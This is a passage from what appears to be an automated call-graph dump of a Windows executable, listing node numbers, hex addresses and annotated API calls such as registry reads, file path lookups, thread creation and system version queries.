105978->105917 105979->105917 105981 c35cb0 105980->105981 105982 c28db6 __beginthreadex 9 API calls 105981->105982 105982->105978 105983->105908 105984->105913 105985->105930 105986->105915 105987->105920 105988->105930 105989->105909 105990->105927 105991->105961 105992->105951 105993->105930 105994->105930 105995->105938 105996->105930 105997->105831 105998->105833 106022 c2d4c3 105999->106022 106001 c30aeb 106002 c30b41 106001->106002 106003 c30b1f 106001->106003 106005 c2d4c3 __commit 58 API calls 106001->106005 106035 c2d43d 59 API calls 2 library calls 106002->106035 106003->106002 106006 c2d4c3 __commit 58 API calls 106003->106006 106009 c30b16 106005->106009 106010 c30b2b CloseHandle 106006->106010 106007 c30b49 106008 c30b6b 106007->106008 106036 c28b07 58 API calls 3 library calls 106007->106036 106008->105858 106012 c2d4c3 __commit 58 API calls 106009->106012 106010->106002 106013 c30b37 GetLastError 106010->106013 106012->106003 106013->106002 106014->105840 106015->105847 106016->105846 106017->105858 106018->105847 106019->105846 106020->105852 106021->105847 106023 c2d4e3 106022->106023 106024 c2d4ce 106022->106024 106029 c2d508 106023->106029 106039 c28af4 58 API calls __getptd_noexit 106023->106039 106037 c28af4 58 API calls __getptd_noexit 106024->106037 106026 c2d4d3 106038 c28b28 58 API calls __getptd_noexit 106026->106038 106029->106001 106030 c2d512 106040 c28b28 58 API calls __getptd_noexit 106030->106040 106032 c2d4db 106032->106001 106033 c2d51a 106041 c28db6 9 API calls __beginthreadex 106033->106041 106035->106007 106036->106008 106037->106026 106038->106032 106039->106030 106040->106033 106041->106032 106104 c31940 106042->106104 106045 c04799 106110 c07d8c 106045->106110 106046 c0477c 106048 c07bcc 59 API calls 106046->106048 106049 c04788 106048->106049 106106 c07726 106049->106106 106052 c20791 106053 c2079e __write_nolock 106052->106053 106054 c2079f GetLongPathNameW 106053->106054 106055 c07bcc 59 API calls 106054->106055 106056 c072bd 106055->106056 106057 c0700b 106056->106057 106058 c07667 59 API calls 106057->106058 106059 c0701d 106058->106059 106060 c04750 60 API calls 106059->106060 106061 c07028 106060->106061 106062 c07033 106061->106062 106063 c3e885 106061->106063 106065 c03f74 59 API calls 106062->106065 106068 c3e89f 106063->106068 106120 c07908 61 API calls 106063->106120 106066 c0703f 106065->106066 106114 c034c2 106066->106114 106069 c07052 Mailbox 106069->105196 106071 c04ddd 136 API calls 106070->106071 106072 c0688f 106071->106072 106073 c3e031 106072->106073 106074 c04ddd 136 API calls 106072->106074 106075 c6955b 122 API calls 106073->106075 106076 c068a3 106074->106076 106077 c3e046 106075->106077 106076->106073 106078 c068ab 106076->106078 106079 c3e067 106077->106079 106080 c3e04a 106077->106080 106082 c3e052 106078->106082 106083 c068b7 106078->106083 106081 c20db6 Mailbox 59 API calls 106079->106081 106084 c04e4a 84 API calls 106080->106084 106088 c3e0ac Mailbox 106081->106088 106223 c642f8 90 API calls _wprintf 106082->106223 106121 c06a8c 106083->106121 106084->106082 106087 c3e060 106087->106079 106090 c3e260 106088->106090 106098 c3e271 106088->106098 106101 c07de1 59 API calls 106088->106101 106214 c5f73d 106088->106214 106217 c6737f 106088->106217 106224 c5f65e 61 API calls 2 library calls 106088->106224 106225 c0750f 59 API calls 2 library calls 106088->106225 106226 c0735d 59 API calls Mailbox 106088->106226 106091 c22d55 _free 58 API calls 106090->106091 106092 c3e268 106091->106092 106093 c04e4a 84 API calls 106092->106093 106093->106098 106097 c22d55 _free 58 API calls 106097->106098 106098->106097 106100 c04e4a 84 API calls 106098->106100 106227 c5f7a1 89 API calls 4 library calls 106098->106227 106100->106098 106101->106088 106105 c0475d GetFullPathNameW 106104->106105 106105->106045 106105->106046 106107 c07734 106106->106107 106108 c07d2c 59 API calls 106107->106108 106109 c04794 106108->106109 106109->106052 106111 c07da6 106110->106111 106113 c07d99 106110->106113 106112 c20db6 Mailbox 59 API calls 106111->106112 106112->106113 106113->106049 106115 c034d4 106114->106115 106119 c034f3 _memmove 106114->106119 106117 c20db6 Mailbox 59 API calls 106115->106117 106116 c20db6 Mailbox 59 API calls 106118 c0350a 106116->106118 106117->106119 106118->106069 106119->106116 106120->106063 106122 c06ab5 106121->106122 106123 c3e41e 106121->106123 106233 c057a6 60 API calls Mailbox 106122->106233 106300 c5f7a1 89 API calls 4 library calls 106123->106300 106126 c06ad7 106234 c057f6 67 API calls 106126->106234 106127 c3e431 106301 c5f7a1 89 API calls 4 library calls 106127->106301 106129 c06aec 106129->106127 106131 c06af4 106129->106131 106133 c07667 59 API calls 106131->106133 106132 c3e44d 106135 c06b61 106132->106135 106134 c06b00 106133->106134 106235 c20957 60 API calls __write_nolock 106134->106235 106137 c3e460 106135->106137 106138 c06b6f 106135->106138 106141 c05c6f CloseHandle 106137->106141 106142 c07667 59 API calls 106138->106142 106139 c06b0c 106140 c07667 59 API calls 106139->106140 106143 c06b18 106140->106143 106144 c3e46c 106141->106144 106145 c06b78 106142->106145 106146 c04750 60 API calls 106143->106146 106147 c04ddd 136 API calls 106144->106147 106148 c07667 59 API calls 106145->106148 106149 c06b26 106146->106149 106150 c3e488 106147->106150 106151 c06b81 106148->106151 106236 c05850 ReadFile SetFilePointerEx 106149->106236 106153 c3e4b1 106150->106153 106157 c6955b 122 API calls 106150->106157 106238 c0459b 106151->106238 106302 c5f7a1 89 API calls 4 library calls 106153->106302 106156 c06b52 106237 c05aee SetFilePointerEx SetFilePointerEx 106156->106237 106161 c3e4a4 106157->106161 106158 c06b98 106162 c07b2e 59 API calls 106158->106162 106159 c3e4c8 106192 c06d0c Mailbox 106159->106192 106164 c3e4cd 106161->106164 106165 c3e4ac 106161->106165 106163 c06ba9 SetCurrentDirectoryW 106162->106163 106170 c06bbc Mailbox 106163->106170 106166 c04e4a 84 API calls 106164->106166 106167 c04e4a 84 API calls 106165->106167 106168 c3e4d2 106166->106168 106167->106153 106169 c20db6 Mailbox 59 API calls 106168->106169 106176 c3e506 106169->106176 106172 c20db6 Mailbox 59 API calls 106170->106172 106174 c06bcf 106172->106174 106173 c03bbb 106173->105050 106173->105059 106175 c0522e 59 API calls 106174->106175 106203 c06bda Mailbox __wsetenvp 106175->106203 106303 c0750f 59 API calls 2 library calls 106176->106303 106178 c06ce7 106296 c05c6f 106178->106296 106181 c3e740 106307 c672df 59 API calls Mailbox 106181->106307 106182 c06cf3 SetCurrentDirectoryW 106182->106192 106185 c3e762 106308 c7fbce 59 API calls 2 library calls 106185->106308 106188 c3e76f 106190 c22d55 _free 58 API calls 106188->106190 106189 c3e7d9 106311 c5f7a1 89 API calls 4 library calls 106189->106311 106190->106192 106228 c057d4 106192->106228 106195 c3e7f2 106195->106178 106197 c3e7d1 106310 c5f5f7 59 API calls 4 library calls 106197->106310 106200 c07de1 59 API calls 106200->106203 106201 c5f73d 59 API calls 106205 c3e54f Mailbox 106201->106205 106203->106178 106203->106189 106203->106197 106203->106200 106289 c0586d 67 API calls _wcscpy 106203->106289 106290 c06f5d GetStringTypeW 106203->106290 106291 c06ecc 60 API calls __wcsnicmp 106203->106291 106292 c06faa GetStringTypeW __wsetenvp 106203->106292 106293 c2363d GetStringTypeW _iswctype 106203->106293 106294 c068dc 165 API calls 3 library calls 106203->106294 106295 c07213 59 API calls Mailbox 106203->106295 106204 c07de1 59 API calls 106204->106205 106205->106181 106205->106201 106205->106204 106207 c6737f 59 API calls 106205->106207 106209 c3e792 106205->106209 106304 c5f65e 61 API calls 2 library calls 106205->106304 106305 c0750f 59 API calls 2 library calls 106205->106305 106306 c07213 59 API calls Mailbox 106205->106306 106207->106205 106309 c5f7a1 89 API calls 4 library calls 106209->106309 106211 c3e7ab 106212 c22d55 _free 58 API calls 106211->106212 106213 c3e7be 106212->106213 106213->106192 106215 c20db6 Mailbox 59 API calls 106214->106215 106216 c5f76d _memmove 106215->106216 106216->106088 106218 c6738a 106217->106218 106219 c20db6 Mailbox 59 API calls 106218->106219 106220 c673a1 106219->106220 106221 c673b0 106220->106221 106222 c07de1 59 API calls 106220->106222 106221->106088 106222->106221 106223->106087 106224->106088 106225->106088 106226->106088 106227->106098 106229 c05c6f CloseHandle 106228->106229 106230 c057dc Mailbox 106229->106230 106231 c05c6f CloseHandle 106230->106231 106232 c057eb 106231->106232 106232->106173 106233->106126 106234->106129 106235->106139 106236->106156 106237->106135 106239 c07667 59 API calls 106238->106239 106240 c045b1 106239->106240 106241 c07667 59 API calls 106240->106241 106242 c045b9 106241->106242 106243 c07667 59 API calls 106242->106243 106244 c045c1 106243->106244 106245 c07667 59 API calls 106244->106245 106246 c045c9 106245->106246 106247 c3d4d2 106246->106247 106248 c045fd 106246->106248 106249 c08047 59 API calls 106247->106249 106250 c0784b 59 API calls 106248->106250 106251 c3d4db 106249->106251 106252 c0460b 106250->106252 106253 c07d8c 59 API calls 106251->106253 106254 c07d2c 59 API calls 106252->106254 106256 c04640 106253->106256 106255 c04615 106254->106255 106255->106256 106257 c0784b 59 API calls 106255->106257 106259 c3d4fb 106256->106259 106260 c0465f 106256->106260 106275 c04680 106256->106275 106261 c04636 106257->106261 106263 c3d5cb 106259->106263 106273 c3d5b4 106259->106273 106282 c3d532 106259->106282 106265 c079f2 59 API calls 106260->106265 106264 c07d2c 59 API calls 106261->106264 106262 c04691 106267 c08047 59 API calls 106262->106267 106269 c046a3 106262->106269 106266 c07bcc 59 API calls 106263->106266 106264->106256 106270 c04669 106265->106270 106284 c3d588 106266->106284 106267->106269 106268 c046b3 106274 c046ba 106268->106274 106276 c08047 59 API calls 106268->106276 106269->106268 106272 c08047 59 API calls 106269->106272 106271 c0784b 59 API calls 106270->106271 106270->106275 106271->106275 106272->106268 106273->106263 106278 c3d59f 106273->106278 106277 c08047 59 API calls 106274->106277 106286 c046c1 Mailbox 106274->106286 106312 c0784b 106275->106312 106276->106274 106277->106286 106280 c07bcc 59 API calls 106278->106280 106279 c3d590 106281 c07bcc 59 API calls 106279->106281 106280->106284 106281->106284 106282->106279 106287 c3d57b 106282->106287 106283 c079f2 59 API calls 106283->106284 106284->106275 106284->106283 106325 c07924 59 API calls 2 library calls 106284->106325 106286->106158 106288 c07bcc 59 API calls 106287->106288 106288->106284 106289->106203 106290->106203 106291->106203 106292->106203 106293->106203 106294->106203 106295->106203 106297 c05c88 106296->106297 106298 c05c79 106296->106298 106297->106298 106299 c05c8d CloseHandle 106297->106299 106298->106182 106299->106298 106300->106127 106301->106132 106302->106159 106303->106205 106304->106205 106305->106205 106306->106205 106307->106185 106308->106188 106309->106211 106310->106189 106311->106195 106313 c078b7 106312->106313 106314 c0785a 106312->106314 106315 c07d2c 59 API calls 106313->106315 106314->106313 106316 c07865 106314->106316 106322 c07888 _memmove 106315->106322 106317 c07880 106316->106317 106318 c3eb09 106316->106318 106326 c07f27 59 API calls Mailbox 106317->106326 106320 c08029 59 API calls 106318->106320 106321 c3eb13 106320->106321 106323 c20db6 Mailbox 59 API calls 106321->106323 106322->106262 106324 c3eb33 106323->106324 106325->106284 106326->106322 106328 c06d95 106327->106328 106334 c06ea9 106327->106334 106329 c20db6 Mailbox 59 API calls 106328->106329 106328->106334 106331 c06dbc 106329->106331 106330 c20db6 Mailbox 59 API calls 106332 c06e31 106330->106332 106331->106330 106332->106334 106340 c06240 106332->106340 106365 c0735d 59 API calls Mailbox 106332->106365 106366 c56553 59 API calls Mailbox 106332->106366 106367 c0750f 59 API calls 2 library calls 106332->106367 106334->105202 106338->105205 106339->105207 106341 c07a16 59 API calls 106340->106341 106359 c06265 106341->106359 106342 c0646a 106370 c0750f 59 API calls 2 library calls 106342->106370 106344 c06484 Mailbox 106344->106332 106347 c3dff6 106373 c5f8aa 91 API calls 4 library calls 106347->106373 106348 c07d8c 59 API calls 106348->106359 106349 c0750f 59 API calls 106349->106359 106353 c3e004 106374 c0750f 59 API calls 2 library calls 106353->106374 106355 c3e01a 106355->106344 106356 c06799 _memmove 106375 c5f8aa 91 API calls 4 library calls 106356->106375 106357 c3df92 106358 c08029 59 API calls 106357->106358 106360 c3df9d 106358->106360 106359->106342 106359->106347 106359->106348 106359->106349 106359->106356 106359->106357 106362 c07e4f 59 API calls 106359->106362 106368 c05f6c 60 API calls 106359->106368 106369 c05d41 59 API calls Mailbox 106359->106369 106371 c05e72 60 API calls 106359->106371 106372 c07924 59 API calls 2 library calls 106359->106372 106364 c20db6 Mailbox 59 API calls 106360->106364 106363 c0643b CharUpperBuffW 106362->106363 106363->106359 106364->106356 106365->106332 106366->106332 106367->106332 106368->106359 106369->106359 106370->106344 106371->106359 106372->106359 106373->106353 106374->106355 106375->106344 106376->105221 106377->105220 106379 c0e6d5 106378->106379 106380 c43aa9 106379->106380 106383 c0e73f 106379->106383 106392 c0e799 106379->106392 106562 c09ea0 106380->106562 106382 c43abe 106396 c0e970 Mailbox 106382->106396 106586 c69e4a 89 API calls 4 library calls 106382->106586 106386 c07667 59 API calls 106383->106386 106383->106392 106384 c07667 59 API calls 106384->106392 106387 c43b04 106386->106387 106389 c22d40 __cinit 67 API calls 106387->106389 106388 c22d40 __cinit 67 API calls 106388->106392 106389->106392 106390 c43b26 106390->105298 106391 c084c0 69 API calls 106391->106396 106392->106384 106392->106388 106392->106390 106393 c0e95a 106392->106393 106392->106396 106393->106396 106587 c69e4a 89 API calls 4 library calls 106393->106587 106395 c09ea0 331 API calls 106395->106396 106396->106391 106396->106395 106397 c0f195 106396->106397 106398 c09c90 Mailbox 59 API calls 106396->106398 106401 c08d40 59 API calls 106396->106401 106407 c69e4a 89 API calls 106396->106407 106408 c0ea78 106396->106408 106561 c07f77 59 API calls 2 library calls 106396->106561 106588 c56e8f 59 API calls 106396->106588 106589 c7c5c3 331 API calls 106396->106589 106590 c7b53c 331 API calls Mailbox 106396->106590 106592 c793c6 331 API calls Mailbox 106396->106592 106591 c69e4a 89 API calls 4 library calls 106397->106591 106398->106396 106401->106396 106406 c43e25 106406->105298 106407->106396 106408->105298 106410 c0f650 106409->106410 106411 c0f4ba 106409->106411 106414 c07de1 59 API calls 106410->106414 106412 c0f4c6 106411->106412 106413 c4441e 106411->106413 106691 c0f290 331 API calls 2 library calls 106412->106691 106692 c7bc6b 331 API calls Mailbox 106413->106692 106420 c0f58c Mailbox 106414->106420 106417 c4442c 106421 c0f630 106417->106421 106693 c69e4a 89 API calls 4 library calls 106417->106693 106419 c0f4fd 106419->106417 106419->106420 106419->106421 106425 c04e4a 84 API calls 106420->106425 106599 c63c37 106420->106599 106602 c7445a 106420->106602 106611 c6cb7a 106420->106611 106421->105298 106422 c09c90 Mailbox 59 API calls 106423 c0f5e3 106422->106423 106423->106421 106423->106422 106425->106423 106429 c03212 106428->106429 106431 c031e0 106428->106431 106429->105298 106430 c03205 IsDialogMessageW 106430->106429 106430->106431 106431->106429 106431->106430 106432 c3cf32 GetClassLongW 106431->106432 106432->106430 106432->106431 106433->105298 106851 c08180 106434->106851 106436 c0fd3d 106438 c4472d 106436->106438 106483 c106f6 106436->106483 106856 c0f234 106436->106856 106870 c69e4a 89 API calls 4 library calls 106438->106870 106441 c44742 106442 c4488d 106442->106441 106447 c0fe4c 106442->106447 106876 c7a2d9 85 API calls Mailbox 106442->106876 106443 c10517 106453 c20db6 Mailbox 59 API calls 106443->106453 106444 c0fe3e 106444->106442 106444->106447 106874 c566ec 59 API calls 2 library calls 106444->106874 106446 c20db6 59 API calls Mailbox 106476 c0fdd3 106446->106476 106454 c448f9 106447->106454 106501 c44b53 106447->106501 106860 c0837c 106447->106860 106448 c447d7 106448->106441 106872 c69e4a 89 API calls 4 library calls 106448->106872 106450 c44848 106875 c560ef 59 API calls 2 library calls 106450->106875 106463 c10545 _memmove 106453->106463 106464 c44917 106454->106464 106878 c085c0 106454->106878 106456 c44755 106456->106448 106871 c0f6a3 331 API calls 106456->106871 106459 c0fea4 106468 c44ad6 106459->106468 106469 c0ff32 106459->106469 106508 c10179 Mailbox _memmove 106459->106508 106460 c4486b 106465 c09ea0 331 API calls 106460->106465 106461 c448b2 Mailbox 106461->106447 106877 c566ec 59 API calls 2 library calls 106461->106877 106470 c20db6 Mailbox 59 API calls 106463->106470 106467 c44928 106464->106467 106472 c085c0 59 API calls 106464->106472 106465->106442 106467->106508 106886 c560ab 59 API calls Mailbox 106467->106886 106890 c69ae7 60 API calls 106468->106890 106473 c20db6 Mailbox 59 API calls 106469->106473 106512 c10106 _memmove 106470->106512 106472->106467 106476->106441 106476->106443 106476->106444 106476->106446 106476->106456 106476->106463 106478 c09ea0 331 API calls 106476->106478 106486 c4480c 106476->106486 106478->106476 106479 c44a4d 106480 c09ea0 331 API calls 106479->106480 106482 c44a87 106480->106482 106482->106441 106488 c084c0 69 API calls 106482->106488 106869 c69e4a 89 API calls 4 library calls 106483->106869 106873 c69e4a 89 API calls 4 library calls 106486->106873 106490 c44ab2 106488->106490 106889 c69e4a 89 API calls 4 library calls 106490->106889 106493 c09d3c 60 API calls 106493->106508 106496 c09c90 Mailbox 59 API calls 106496->106512 106497 c20db6 59 API calls Mailbox 106497->106508 106499 c10398 106499->105298 106501->106441 106891 c69e4a 89 API calls 4 library calls 106501->106891 106506 c44a1c 106509 c20db6 Mailbox 59 API calls 106506->106509 106508->106479 106508->106483 106508->106490 106508->106493 106508->106497 106508->106499 106508->106506 106867 c08740 68 API calls __cinit 106508->106867 106868 c08660 68 API calls 106508->106868 106887 c65937 68 API calls 106508->106887 106888 c089b3 69 API calls Mailbox 106508->106888 106509->106479 106512->106496 106512->106508 106513 c10162 106512->106513 106513->105298 106514->105228 106515->105233 106516->105298 106517->105235 106518->105235 106519->105235 106520->105298 106521->105298 106522->105298 106524 c09851 106523->106524 106525 c0984b 106523->106525 106526 c3f5d3 __i64tow 106524->106526 106527 c09899 106524->106527 106529 c09857 __itow 106524->106529 106533 c3f4da 106524->106533 106525->105298 106894 c23698 83 API calls 3 library calls 106527->106894 106531 c20db6 Mailbox 59 API calls 106529->106531 106532 c09871 106531->106532 106532->106525 106536 c07de1 59 API calls 106532->106536 106534 c3f552 Mailbox _wcscpy 106533->106534 106535 c20db6 Mailbox 59 API calls 106533->106535 106895 c23698 83 API calls 3 library calls 106534->106895 106537 c3f51f 106535->106537 106536->106525 106538 c20db6 Mailbox 59 API calls 106537->106538 106539 c3f545 106538->106539 106539->106534 106540 c07de1 59 API calls 106539->106540 106540->106534 106541->105298 106542->105298 106544 c3eda1 106543->106544 106547 c082f2 106543->106547 106545 c3edb1 106544->106545 106896 c561a4 59 API calls 106544->106896 106548 c0831c 106547->106548 106549 c085c0 59 API calls 106547->106549 106553 c08339 Mailbox 106547->106553 106550 c08322 106548->106550 106551 c085c0 59 API calls 106548->106551 106549->106548 106552 c09c90 Mailbox 59 API calls 106550->106552 106550->106553 106551->106550 106552->106553 106553->105298 106554->105284 106555->105284 106556->105284 106557->105284 106558->105284 106559->105284 106560->105284 106561->106396 106563 c09ebf 106562->106563 106583 c09eed Mailbox 106562->106583 106564 c20db6 Mailbox 59 API calls 106563->106564 106564->106583 106565 c22d40 67 API calls __cinit 106565->106583 106566 c0b47a 106569 c40055 106566->106569 106584 c409e5 106566->106584 106567 c0b475 106568 c08047 59 API calls 106567->106568 106580 c0a057 106568->106580 106595 c69e4a 89 API calls 4 library calls 106569->106595 106573 c20db6 59 API calls Mailbox 106573->106583 106574 c40064 106574->106382 106577 c08047 59 API calls 106577->106583 106578 c07667 59 API calls 106578->106583 106579 c56e8f 59 API calls 106579->106583 106580->106382 106581 c409d6 106597 c69e4a 89 API calls 4 library calls 106581->106597 106583->106565 106583->106566 106583->106567 106583->106569 106583->106573 106583->106577 106583->106578 106583->106579 106583->106580 106583->106581 106585 c0a55a 106583->106585 106593 c0c8c0 331 API calls 2 library calls 106583->106593 106594 c0b900 60 API calls Mailbox 106583->106594 106598 c69e4a 89 API calls 4 library calls 106584->106598 106596 c69e4a 89 API calls 4 library calls 106585->106596 106586->106396 106587->106396 106588->106396 106589->106396 106590->106396 106591->106406 106592->106396 106593->106583 106594->106583 106595->106574 106596->106580 106597->106584 106598->106580 106694 c6445a GetFileAttributesW 106599->106694 106603 c09837 84 API calls 106602->106603 106604 c74494 106603->106604 106605 c06240 94 API calls 106604->106605 106606 c744a4 106605->106606 106607 c09ea0 331 API calls 106606->106607 106609 c744c9 106606->106609 106607->106609 106610 c744cd 106609->106610 106698 c09a98 59 API calls Mailbox 106609->106698 106610->106423 106612 c07667 59 API calls 106611->106612 106613 c6cbaf 106612->106613 106614 c07667 59 API calls 106613->106614 106615 c6cbb8 106614->106615 106616 c6cbcc 106615->106616 106808 c09b3c 59 API calls 106615->106808 106618 c09837 84 API calls 106616->106618 106619 c6cbe9 106618->106619 106620 c6ccea 106619->106620 106621 c6cc0b 106619->106621 106632 c6cd1a Mailbox 106619->106632 106623 c04ddd 136 API calls 106620->106623 106622 c09837 84 API calls 106621->106622 106624 c6cc17 106622->106624 106625 c6ccfe 106623->106625 106626 c08047 59 API calls 106624->106626 106627 c6cd16 106625->106627 106630 c04ddd 136 API calls 106625->106630 106629 c6cc23 106626->106629 106628 c07667 59 API calls 106627->106628 106627->106632 106631 c6cd4b 106628->106631 106635 c6cc37 106629->106635 106636 c6cc69 106629->106636 106630->106627 106633 c07667 59 API calls 106631->106633 106632->106423 106691->106419 106692->106417 106693->106421 106695 c63c3e 106694->106695 106696 c64475 FindFirstFileW 106694->106696 106695->106423 106696->106695 106697 c6448a FindClose 106696->106697 106697->106695 106698->106610 106808->106616 106852 c0818f 106851->106852 106855 c081aa 106851->106855 106853 c07e4f 59 API calls 106852->106853 106854 c08197 CharUpperBuffW 106853->106854 106854->106855 106855->106436 106857 c0f251 106856->106857 106859 c0f272 106857->106859 106892 c69e4a 89 API calls 4 library calls 106857->106892 106859->106476 106861 c0838d 106860->106861 106862 c3edbd 106860->106862 106863 c20db6 Mailbox 59 API calls 106861->106863 106864 c08394 106863->106864 106865 c083b5 106864->106865 106893 c08634 59 API calls Mailbox 106864->106893 106865->106454 106865->106459 106867->106508 106868->106508 106869->106438 106870->106441 106871->106448 106872->106441 106873->106441 106874->106450 106875->106460 106876->106461 106877->106461 106879 c085ce 106878->106879 106885 c085f6 106878->106885 106880 c085dc 106879->106880 106882 c085c0 59 API calls 106879->106882 106881 c085e2 106880->106881 106883 c085c0 59 API calls 106880->106883 106884 c09c90 Mailbox 59 API calls 106881->106884 106881->106885 106882->106880 106883->106881 106884->106885 106885->106464 106886->106508 106887->106508 106888->106508 106889->106441 106891->106441 106892->106859 106893->106865 106894->106529 106895->106526 106896->106545 106897 c3fe27 106910 c1f944 106897->106910 106899 c3fe3d 106900 c3fe53 106899->106900 106901 c3febe 106899->106901 106919 c09e5d 60 API calls 106900->106919 106906 c0fce0 331 API calls 106901->106906 106903 c3fe92 106904 c4089c 106903->106904 106905 c3fe9a 106903->106905 106921 c69e4a 89 API calls 4 library calls 106904->106921 106920 c6834f 59 API calls Mailbox 106905->106920 106909 c3feb2 Mailbox 106906->106909 106911 c1f950 106910->106911 106912 c1f962 106910->106912 106913 c09d3c 60 API calls 106911->106913 106914 c1f991 106912->106914 106915 c1f968 106912->106915 106918 c1f95a 106913->106918 106917 c09d3c 60 API calls 106914->106917 106916 c20db6 Mailbox 59 API calls 106915->106916 106916->106918 106917->106918 106918->106899 106919->106903 106920->106909 106921->106909 106922 c01055 106927 c02649 106922->106927 106925 c22d40 __cinit 67 API calls 106926 c01064 106925->106926 106928 c07667 59 API calls 106927->106928 106929 c026b7 106928->106929 106934 c03582 106929->106934 106932 c02754 106933 c0105a 106932->106933 106937 c03416 59 API calls 2 library calls 106932->106937 106933->106925 106938 c035b0 106934->106938 106937->106932 106939 c035bd 106938->106939 106940 c035a1 106938->106940 106939->106940 106941 c035c4 RegOpenKeyExW 106939->106941 106940->106932 106941->106940 106942 c035de RegQueryValueExW 106941->106942 106943 c03614 RegCloseKey 106942->106943 106944 c035ff 106942->106944 106943->106940 106944->106943 106945 c01066 106950 c0f76f 106945->106950 106947 c0106c 106948 c22d40 __cinit 67 API calls 106947->106948 106949 c01076 106948->106949 106951 c0f790 106950->106951 106983 c1ff03 106951->106983 106955 c0f7d7 106956 c07667 59 API calls 106955->106956 106957 c0f7e1 106956->106957 106958 c07667 59 API calls 106957->106958 106959 c0f7eb 106958->106959 106960 c07667 59 API calls 106959->106960 106961 c0f7f5 106960->106961 106962 c07667 59 API calls 106961->106962 106963 c0f833 106962->106963 106964 c07667 59 API calls 106963->106964 106965 c0f8fe 106964->106965 106993 c15f87 106965->106993 106969 c0f930 106970 c07667 59 API calls 106969->106970 106971 c0f93a 106970->106971 107021 c1fd9e 106971->107021 106973 c0f981 106974 c0f991 GetStdHandle 106973->106974 106975 c0f9dd 106974->106975 106976 c445ab 106974->106976 106977 c0f9e5 OleInitialize 106975->106977 106976->106975 106978 c445b4 106976->106978 106977->106947 107028 c66b38 64 API calls Mailbox 106978->107028 106980 c445bb 107029 c67207 CreateThread 106980->107029 106982 c445c7 CloseHandle 106982->106977 107030 c1ffdc 106983->107030 106986 c1ffdc 59 API calls 106987 c1ff45 106986->106987 106988 c07667 59 API calls 106987->106988 106989 c1ff51 106988->106989 106990 c07bcc 59 API calls 106989->106990 106991 c0f796 106990->106991 106992 c20162 6 API calls 106991->106992 106992->106955 106994 c07667 59 API calls 106993->106994 106995 c15f97 106994->106995 106996 c07667 59 API calls 106995->106996 106997 c15f9f 106996->106997 107037 c15a9d 106997->107037 107000 c15a9d 59 API calls 107001 c15faf 107000->107001 107002 c07667 59 API calls 107001->107002 107003 c15fba 107002->107003 107004 c20db6 Mailbox 59 API calls 107003->107004 107005 c0f908 107004->107005 107006 c160f9 107005->107006 107007 c16107 107006->107007 107008 c07667 59 API calls 107007->107008 107009 c16112 107008->107009 107010 c07667 59 API calls 107009->107010 107011 c1611d 107010->107011 107012 c07667 59 API calls 107011->107012 107013 c16128 107012->107013 107014 c07667 59 API calls 107013->107014 107015 c16133 107014->107015 107016 c15a9d 59 API calls 107015->107016 107017 c1613e 107016->107017 107018 c20db6 Mailbox 59 API calls 107017->107018 107019 c16145 RegisterWindowMessageW 107018->107019 107019->106969 107022 c5576f 107021->107022 107023 c1fdae 107021->107023 107040 c69ae7 60 API calls 107022->107040 107024 c20db6 Mailbox 59 API calls 107023->107024 107026 c1fdb6 107024->107026 107026->106973 107027 c5577a 107028->106980 107029->106982 107041 c671ed 65 API calls 107029->107041 107031 c07667 59 API calls 107030->107031 107032 c1ffe7 107031->107032 107033 c07667 59 API calls 107032->107033 107034 c1ffef 107033->107034 107035 c07667 59 API calls 107034->107035 107036 c1ff3b 107035->107036 107036->106986 107038 c07667 59 API calls 107037->107038 107039 c15aa5 107038->107039 107039->107000 107040->107027 107042 c01016 107047 c04974 107042->107047 107045 c22d40 __cinit 67 API calls 107046 c01025 107045->107046 107048 c20db6 Mailbox 59 API calls 107047->107048 107049 c0497c 107048->107049 107050 c0101b 107049->107050 107054 c04936 107049->107054 107050->107045 107055 c04951 107054->107055 107056 c0493f 107054->107056 107058 c049a0 107055->107058 107057 c22d40 __cinit 67 API calls 107056->107057 107057->107055 107059 c07667 59 API calls 107058->107059 107060 c049b8 GetVersionExW 107059->107060 107061 c07bcc 59 API calls 107060->107061 107062 c049fb 107061->107062 107063 c07d2c 59 API calls 107062->107063 107072 c04a28 107062->107072 107064 c04a1c 107063->107064 107065 c07726 59 API calls 107064->107065 107065->107072 107066 c04a93 GetCurrentProcess IsWow64Process 107067 c04aac 107066->107067 107068 c04ac2 107067->107068 107069 c04b2b GetSystemInfo 107067->107069 107082 c04b37 107068->107082 107071 c04af8 107069->107071 107070 c3d864 107071->107050 107072->107066 107072->107070 107075 c04ad4 107077 c04b37 2 API calls 107075->107077 107076 c04b1f GetSystemInfo 107078 c04ae9 107076->107078 107079 c04adc GetNativeSystemInfo 107077->107079 107078->107071 107080 c04aef FreeLibrary 107078->107080 107079->107078 107080->107071 107083 c04ad0 107082->107083 107084 c04b40 LoadLibraryA 107082->107084 107083->107075 107083->107076 107084->107083 107085 c04b51 GetProcAddress 107084->107085 107085->107083 107086 c4416f 107090 c55fe6 107086->107090 107088 c4417a 107089 c55fe6 85 API calls 107088->107089 107089->107088 107091 c56020 107090->107091 107095 c55ff3 107090->107095 107091->107088 107092 c56022 107102 c09328 84 API calls Mailbox 107092->107102 107093 c56027 107096 c09837 84 API calls 107093->107096 107095->107091 107095->107092 107095->107093 107099 c5601a 107095->107099 107097 c5602e 107096->107097 107098 c07b2e 59 API calls 107097->107098 107098->107091 107101 c095a0 59 API calls _wcsstr 107099->107101 107101->107091 107102->107093 107103 c0107d 107108 c0708b 107103->107108 107105 c0108c 107106 c22d40 __cinit 67 API calls 107105->107106 107107 c01096 107106->107107 107109 c0709b __write_nolock 107108->107109 107110 c07667 59 API calls 107109->107110 107111 c07151 107110->107111 107112 c04706 61 API calls 107111->107112 107113 c0715a 107112->107113 107139 c2050b 107113->107139 107116 c07cab 59 API calls 107117 c07173 107116->107117 107118 c03f74 59 API calls 107117->107118 107119 c07182 107118->107119 107120 c07667 59 API calls 107119->107120 107121 c0718b 107120->107121 107122 c07d8c 59 API calls 107121->107122 107123 c07194 RegOpenKeyExW 107122->107123 107124 c3e8b1 RegQueryValueExW 107123->107124 107128 c071b6 Mailbox 107123->107128 107125 c3e943 RegCloseKey 107124->107125 107126 c3e8ce 107124->107126 107125->107128 107138 c3e955 _wcscat Mailbox __wsetenvp 107125->107138 107127 c20db6 Mailbox 59 API calls 107126->107127 107129 c3e8e7 107127->107129 107128->107105 107130 c0522e 59 API calls 107129->107130 107132 c3e8f2 RegQueryValueExW 107130->107132 107131 c079f2 59 API calls 107131->107138 107133 c3e90f 107132->107133 107135 c3e929 107132->107135 107134 c07bcc 59 API calls 107133->107134 107134->107135 107135->107125 107136 c07de1 59 API calls 107136->107138 107137 c03f74 59 API calls 107137->107138 107138->107128 